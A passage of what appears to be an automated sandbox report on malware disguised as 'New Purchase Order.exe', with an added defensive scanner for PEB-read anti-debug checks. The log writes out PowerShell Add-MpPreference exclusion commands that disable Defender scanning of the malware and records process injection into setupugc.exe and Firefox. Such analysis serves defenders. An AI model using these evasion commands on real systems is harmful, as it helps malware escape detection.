            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov eax, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov edx, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov eax, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C97C mov eax, dword ptr fs:[00000030h]9_2_0185C97C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874978 mov eax, dword ptr fs:[00000030h]9_2_01874978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874978 mov eax, dword ptr fs:[00000030h]9_2_01874978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C89D mov eax, dword ptr fs:[00000030h]9_2_0185C89D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4859 mov eax, dword ptr fs:[00000030h]9_2_017D4859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4859 mov eax, dword ptr fs:[00000030h]9_2_017D4859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E2840 mov ecx, dword ptr fs:[00000030h]9_2_017E2840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov ecx, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A08C0 mov eax, dword ptr fs:[00000030h]9_2_018A08C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A8E4 mov eax, dword ptr fs:[00000030h]9_2_0189A8E4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C8F9 mov eax, dword ptr fs:[00000030h]9_2_0180C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C8F9 mov eax, dword ptr fs:[00000030h]9_2_0180C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C810 mov eax, dword ptr fs:[00000030h]9_2_0185C810
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A830 mov eax, dword ptr fs:[00000030h]9_2_0180A830
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01800854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01866870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01866870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D0887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CCB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C8B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01884BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01884BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187EBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FEB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FEB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185CBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FEBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A4B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01898B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01898B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01884B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01884B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01878B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01866B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01866B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0189AB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187EB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A4A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01808A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01826AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F4A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F4A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01804AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01804AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FEA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185CA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D0AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187EA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: page read and write | page guard
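The `mov eax, dword ptr fs:[00000030h]` entries above are static hits on a byte pattern: on 32-bit Windows the FS segment points at the TEB, offset 0x30 of the TEB is the PEB pointer, and what the code reads from the PEB next (BeingDebugged at +0x02, NtGlobalFlag at +0x68, Ldr at +0x0C for hand-rolled API resolution) is what distinguishes an anti-debug check from ordinary loader housekeeping. The following scanner is an added example, not code from the Joe Sandbox report or from the analysed sample; it decodes the FS-relative load and the dereference that follows it. The byte sample it runs on is hand-assembled for the example and is not taken from the binary.

```python
"""Static scan for x86 reads through the FS segment (TEB/PEB access).

Added example, not code from the Joe Sandbox report or from the analysed sample.
On 32-bit Windows FS points at the TEB, fs:[0x30] is the PEB pointer, and the
PEB fields BeingDebugged (+0x02), Ldr (+0x0C) and NtGlobalFlag (+0x68) are what
anti-debug checks and manual API resolution dereference next.
"""
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
FS_OFFSETS = {0x00: "TEB.ExceptionList", 0x18: "TEB.Self",
              0x30: "TEB.ProcessEnvironmentBlock"}
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}


def _decode_fs_load(code, i):
    """Decode 'mov r32, dword ptr fs:[disp32]' at code[i:] -> (length, reg, disp) or None."""
    if code[i] != 0x64 or i + 6 > len(code):          # 0x64 = FS segment override prefix
        return None
    op = code[i + 1]
    if op == 0xA1:                                      # A1 moffs32: mov eax, fs:[disp32]
        return 6, 0, struct.unpack_from("<I", code, i + 2)[0]
    if op == 0x8B and i + 7 <= len(code):               # 8B /r with mod=00 rm=101: [disp32]
        modrm = code[i + 2]
        if (modrm & 0xC7) == 0x05:
            return 7, (modrm >> 3) & 7, struct.unpack_from("<I", code, i + 3)[0]
    return None


def _decode_field_deref(code, i, base):
    """Return disp8 if code[i:] is 'mov r32,[base+disp8]' or 'movzx r32,byte [base+disp8]'."""
    if base == 4:                                       # rm=100 means SIB, not esp-relative
        return None
    want = 0x40 | base                                  # mod=01 (disp8) with rm=base
    if i + 3 <= len(code) and code[i] == 0x8B and (code[i + 1] & 0xC7) == want:
        return code[i + 2]
    if (i + 4 <= len(code) and code[i] == 0x0F and code[i + 1] == 0xB6
            and (code[i + 2] & 0xC7) == want):
        return code[i + 3]
    return None


def scan_fs_reads(code):
    """Linear byte scan (not a disassembler: a 0x64 inside an immediate can give a
    false positive); returns one dict per FS-relative load found."""
    findings, i = [], 0
    while i < len(code):
        hit = _decode_fs_load(code, i)
        if hit is None:
            i += 1
            continue
        length, reg, disp = hit
        entry = {"offset": i, "reg": REGS[reg], "fs_disp": disp,
                 "what": FS_OFFSETS.get(disp, "fs:[%#x]" % disp), "peb_field": None}
        if disp == 0x30:                                # PEB loaded: which field is read next?
            field = _decode_field_deref(code, i + length, reg)
            if field is not None:
                entry["peb_field"] = PEB_FIELDS.get(field, "PEB+%#x" % field)
        findings.append(entry)
        i += length
    return findings


def looks_like_debugger_check(findings):
    """True when a PEB read feeds BeingDebugged or NtGlobalFlag (classic anti-debug)."""
    return any(f["peb_field"] in ("BeingDebugged", "NtGlobalFlag") for f in findings)


# Constructed sample: hand-assembled x86 bytes, not taken from the analysed file.
SAMPLE = bytes.fromhex(
    "55 8b ec "               # push ebp; mov ebp, esp
    "64 a1 30 00 00 00 "      # mov eax, dword ptr fs:[0x30]   -> PEB
    "0f b6 40 02 "            # movzx eax, byte ptr [eax+0x02] -> PEB.BeingDebugged
    "64 8b 15 30 00 00 00 "   # mov edx, dword ptr fs:[0x30]   -> PEB
    "8b 52 68 "               # mov edx, [edx+0x68]            -> PEB.NtGlobalFlag
    "64 8b 0d 30 00 00 00 "   # mov ecx, dword ptr fs:[0x30]   -> PEB
    "8b 49 0c "               # mov ecx, [ecx+0x0c]            -> PEB.Ldr (API resolution)
    "64 a1 18 00 00 00 "      # mov eax, dword ptr fs:[0x18]   -> TEB.Self
    "c3"                      # ret
)

if __name__ == "__main__":
    hits = scan_fs_reads(SAMPLE)
    for f in hits:
        print("+%#06x mov %s, fs:[%#x]  %s  %s" % (f["offset"], f["reg"], f["fs_disp"],
                                                   f["what"], f["peb_field"] or ""))
    print("debugger check:", looks_like_debugger_check(hits))
```

The scan is deliberately byte-oriented, which is why a sandbox lists every occurrence per function rather than a verdict: a PEB read on its own is also how a legitimate compiler runtime finds the loader data, so the verdict comes from the field dereferenced afterwards.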

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exe | Section loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exe | Section loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
